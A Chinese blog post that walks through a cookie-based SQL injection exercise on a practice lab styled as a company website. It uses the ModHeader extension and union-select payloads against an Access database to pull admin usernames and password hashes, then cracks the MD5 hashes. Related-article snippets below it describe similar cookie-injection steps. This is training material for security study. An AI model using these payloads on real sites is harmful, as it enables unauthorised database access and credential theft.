Cookie注入靶场:模拟公司网站

最新推荐文章于 2023-07-20 17:12:49 发布
最新推荐文章于 2023-07-20 17:12:49 发布
阅读量666 收藏 1
点赞数 1
分类专栏: 网络安全学习 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119179859
版权

靶场

这是一个靶场的样子
在这里插入图片描述
随意点击一个连接,发现是有id号的,但是id前面有shownews.asp这个东西。这个就是典型的Cookie注入标志

在这里插入图片描述

Cookie注入标志

  • 有着如同.asp?id=xxx的url
  • 通常我们先去掉前面的?id=xxx 看它是否显示正常,如果不正常,就说明这个?id=xxx是有着作用的
  • 通常正常注入语句会让JavaScript中的alert报错。

检查是否是Cookie注入

.asp 标志,去掉?id=xx 报错
在这里插入图片描述
不让使用SQL注入语句
在这里插入图片描述
可以断定,这是一个Cookie注入

Cookie注入工具:ModHeader

这是一个插件,火狐和Chrome都有

ModHeader是(但不仅仅是)一个Cookie注入工具。我们将我们正常的sql注入语句输入,就可以看到返回的正常值。这个工具无法读取空格,只能用+代替空格

在这里插入图片描述

注入

再后面填上

id=171+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

发现数据库报错,很可能这是access数据库,因为access数据库中,我们联合查询的值会显示在第一行。,于是我们直接去掉and 1=2

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

在这里插入图片描述
发现回显点,我们发现,有2、7、8、9、3这五个数字,但不一定都是回显点,我们需要试错。
把他们都变成字符串

id=171+union+select+'1','2dsds','3ss',4,5,6,'dsd7','sdsd8','dsds9',10+from+admin

在这里插入图片描述
好,2,3,7,8,9都可以回显

id=171+union+select+'1','2dsds','3ss',4,5,6,7,username,password,10+from+admin

抓用户名和密码

在这里插入图片描述

看到红色的英文加数字,可能是MD5的加密
找到加密工具,解密即可在这里插入图片描述

Access注入cookie注入(含靶场练习)
weixin_60777183的博客
08-31 706
.cookie注入简介 Access → 数据库的一种。除了Access,还有mysql,mssqlsql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是CookieCookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
cookie注入(CTFHUB靶场
weixin_54105551的博客
09-10 1553
因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错。发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了。我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater。尝试一下用gagawesmtx这个表。得到数据库sqli,然后开始爆表。
靶机-南方数据站源代码存在cookie注入
05-09
靶机-南方数据站源代码存在cookie注入网站对get和post请求的参数进行过滤,请使用burpsuite修改cookie进行注入
cookie注入靶场
weixin_45540609的博客
04-19 318
id = 169和id=170-1的页面显示相同,说明有sql注入 字段有10个 union select 1,2,3,4,5,6,7,8,9,10 页面对传参进行拦截 设置cookie名称是id,值是170 发现及时url中没有id值,页面也可以回显id=170的页面,说明cookie值可以影响get传参,也许存在cookie注入 用url encode编码下面语句,放入cookie插件中 170 union select 1,2,3,4,5,6,7,8,9,1...
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2158
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
PHP漏洞靶场:深入学习SQL注入、XSS、文件上传等技巧
环境包含了多种类型的漏洞,例如SQL注入、文件上传、文件下载、跨站脚本攻击(XSS)、万能密码攻击、session和cookie安全问题以及购物逻辑漏洞等。该环境不仅适合作为学习材料,也适用于渗透测试的实践练习。压缩包...
掌握全面SQL注入技巧:sqli-labs靶场深度学习
根据标签“SQL注入靶场”,可以看出这个平台的性质,它是一个专门为学习者设计的,以靶场形式提供各种环境和场景进行SQL注入攻击实践。通过这个平台,学习者可以更好地熟悉SQL注入攻击的多种手法,并在模拟的环境中...
Java安全漏洞靶场:学习与测试的模拟平台
资源摘要信息:"Java安全漏洞靶场是一种模拟环境,用于学习、训练和提升对Java应用程序中常见安全漏洞的理解和应对策略。它提供了一个安全的测试平台,让开发人员和安全研究人员能够实践发现和修复安全漏洞的过程。...
web十大漏洞之xss注入靶场文件
最新发布
11-13
靶场文件是指为了学习和测试目的而设计的安全测试环境,用户可以在其中模拟攻击场景,了解XSS攻击的过程和防御方法。通过靶场文件的实践操作,开发者和安全研究人员可以更好地理解和掌握XSS攻击的原理,从而提高安全...
Cookie在线注入工具
12-13
Cookie在线注入工具 Cookie注入
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
cookie注入工具
06-03
cookie注入工具,方便网管对进行安全检测用
cookie在线注入工具
05-22
cookie在线注入工具cookie在线注入工具
封神台靶场,为了小芳,冲之——cookie注入
Wubuqing的博客
10-30 487
第二个靶场 打开网站 找一下注入点 一般在新闻这种里面点开看看 先判断是否存在注入 有waf 尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼 删掉id=169 发现 然后判断cookie注入 在搜索框输入 Javascript:alert(document.cookie=id=”+escape(‘169’)); 然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能
COOKIE注入靶场实战
0nc3的博客
10-29 2709
0x00 前言 有点忘了sqlmap咋用,想多练下,然后发现一个cookie注入靶场,学习一下 靶场地址: http://117.167.136.245:10181 0x01 手工测试 如何判断为COOKIE注入: 1.寻找形如“.asp?id=xx”类的带参数的URL。 2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。 3.清空浏览器地址栏,输入“j...
sqli-labs靶场实现(八)【cookie注入+cookie base64编码注入】(less-20、less-22、具体步骤+图文详解)
weixin_46709219的博客
01-03 1261
一)cookie注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 二)cookie base64编码注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 —————————————————————————————————————————————————— 一)cookie注入 1)cookie介绍: 服务器可以利用cookie包含信息的任意性来筛选并经常性的
sqlmap使用:ctfhub靶场查询SQL注入+查询Cookie注入+查询UA注入+Refer注入
NSQ0207的博客
07-20 713
CTFHub靶场+cookie注入+查询UA注入+Refer注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值